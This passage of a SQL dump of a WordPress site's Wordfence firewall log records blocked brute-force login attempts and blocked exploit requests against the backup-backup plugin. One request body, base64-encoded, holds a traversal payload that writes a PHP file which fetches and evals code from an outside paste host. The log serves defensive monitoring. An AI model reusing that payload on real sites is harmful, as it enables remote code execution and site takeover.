Firefox/56.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14903,0.000000,1704766840.673476,'\0\0\0\0\0\0\0\0\0\0\"KA',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14900,0.000000,1704763455.967948,'\0\0\0\0\0\0\0\0\0\0Rf',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14980,0.000000,1704807614.320055,'\0\0\0\0\0\0\0\0\0\0aJ[Z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14981,0.000000,1704808588.883282,'\0\0\0\0\0\0\0\0\0\0?G3',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14982,0.000000,1704808740.855953,'\0\0\0\0\0\0\0\0\0\0̼',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14983,0.000000,1704808807.855918,'\0\0\0\0\0\0\0\0\0\0$',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14984,0.000000,1704809056.838959,'\0\0\0\0\0\0\0\0\0\0Ո]',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14985,0.000000,1704810779.623157,'\0\0\0\0\0\0\0\0\0\0.',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14986,0.000000,1704811827.625511,'\0\0\0\0\0\0\0\0\0\0c[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14987,0.000000,1704812111.381410,'* `v@\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14988,1704812639.946359,1704812639.844800,'\0\0\0\0\0\0\0\0\0\0^E$',0,403,0,0,0,'https://tummyrevolution.com/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15043,0.000000,1704829921.416351,'\0\0\0\0\0\0\0\0\0\0l',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15044,1704830457.619259,1704830457.544900,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=rename','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14989,1704812627.334845,1704812627.234700,'\0\0\0\0\0\0\0\0\0\0^E$',0,403,0,0,0,'https://tummyrevolution.com/general.php?pd=1&mapname=op.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dlbmVyYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14883,0.000000,1704759481.246072,'\0\0\0\0\0\0\0\0\0\0\"A\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14884,1704759493.936647,1704759493.847200,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14904,0.000000,1704766843.400236,'\0\0\0\0\0\0\0\0\0\0F=',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14905,0.000000,1704767082.205426,'\0\0\0\0\0\0\0\0\0\0Y\'m',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14906,0.000000,1704768751.232916,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14907,1704768978.323933,1704768978.255800,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://www.tummyrevolution.com/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14924,0.000000,1704778520.738383,'\0\0\0\0\0\0\0\0\0\0б',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14925,0.000000,1704780160.669057,'\0\0\0\0\0\0\0\0\0\0Ո]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14926,0.000000,1704780398.405347,' A\0>\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14908,1704768961.226836,1704768961.156300,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://www.tummyrevolution.com/general.php?pd=1&mapname=op.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dlbmVyYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14921,0.000000,1704776255.273495,'\0\0\0\0\0\0\0\0\0\0NAH',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14922,0.000000,1704776626.983239,'\0\0\0\0\0\0\0\0\0\0\rO',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14923,0.000000,1704778281.239723,'\0\0\0\0\0\0\0\0\0\0ٵ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14909,1704768926.070624,1704768926.001300,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://www.tummyrevolution.com/sample.php?pd=1&mapname=ova-tools.xml','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NhbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14920,0.000000,1704774742.960258,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14885,1704759525.902049,1704759525.815300,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14917,0.000000,1704772852.008183,'\0\0\0\0\0\0\0\0\0\0g',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14918,0.000000,1704773293.305378,'*@\0\0aj:\0\0\0\0\0P',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0','loginFailInvalidUsername',NULL,NULL),(14919,0.000000,1704774500.444172,'\0\0\0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14910,1704768911.642835,1704768911.559800,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://www.tummyrevolution.com/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14913,0.000000,1704770939.067583,'\0\0\0\0\0\0\0\0\0\0\\',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14914,0.000000,1704770968.226856,'\0\0\0\0\0\0\0\0\0\0)3',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14915,0.000000,1704771396.675489,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14916,0.000000,1704772608.719251,'\0\0\0\0\0\0\0\0\0\0-N',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14911,0.000000,1704768994.788232,'\0\0\0\0\0\0\0\0\0\0\rO',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14912,0.000000,1704770673.371846,'\0\0\0\0\0\0\0\0\0\0\rO',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14927,0.000000,1704781119.550024,'*@\0\0aj:\0\0\0\0\0P',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14928,0.000000,1704782046.297462,'\0\0\0\0\0\0\0\0\0\0>B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14929,0.000000,1704782278.957986,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14930,0.000000,1704783932.502045,'\0\0\0\0\0\0\0\0\0\0h',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14931,0.000000,1704784165.959864,' A9\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14932,0.000000,1704784913.659666,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14933,0.000000,1704785306.784524,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14934,0.000000,1704785789.426950,'&\0\0\0\0\0\0$\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14899,1704763317.307446,1704763317.227600,'\0\0\0\0\0\0\0\0\0\0r&',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(14886,1704759551.197643,1704759551.133900,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"ZWNobyAiPD9waHAgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cHM6Ly9yZW50cnkuY28vMmJ1Z20vcmF3JykpOyIgLi4vLi4vLi4vLi4vd3Atbnpzay5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14939,0.000000,1704787473.685153,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,1,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','loginFailValidUsername',NULL,NULL),(14940,0.000000,1704787633.531597,'\0\0\0\0\0\0\0\0\0\0v',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14941,0.000000,1704787869.458088,'\0\0\0\0\0\0\0\0\0\0]',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14942,0.000000,1704789497.343596,'\0\0\0\0\0\0\0\0\0\0@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14943,0.000000,1704789735.805393,' A\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14944,0.000000,1704791221.598856,'\0\0\0\0\0\0\0\0\0\0%',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14945,0.000000,1704791385.591327,'\0\0\0\0\0\0\0\0\0\0v',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14946,0.000000,1704791519.887852,'* h1g\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14947,0.000000,1704791625.921716,'\0\0\0\0\0\0\0\0\0\0j&',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14948,1704791724.633275,1704791724.527700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=rename','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14957,0.000000,1704794054.133102,'\0\0\0\0\0\0\0\0\0\0h-',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14958,0.000000,1704794631.837463,'\0\0\0\0\0\0\0\0\0\0يk',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14956,0.000000,1704793525.795237,'\0\0\0\0\0\0\0\0\0\03',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14898,1704763319.661923,1704763319.591800,'\0\0\0\0\0\0\0\0\0\0r&',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 